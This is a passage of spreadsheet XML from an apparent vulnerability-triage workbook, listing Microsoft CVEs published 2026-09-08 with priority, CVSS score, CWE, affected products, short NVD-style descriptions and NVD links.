      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69355</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69360</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69386</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69434</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69442</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69485</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69494</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69495</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69499</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69511</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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82" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69529</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69547</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
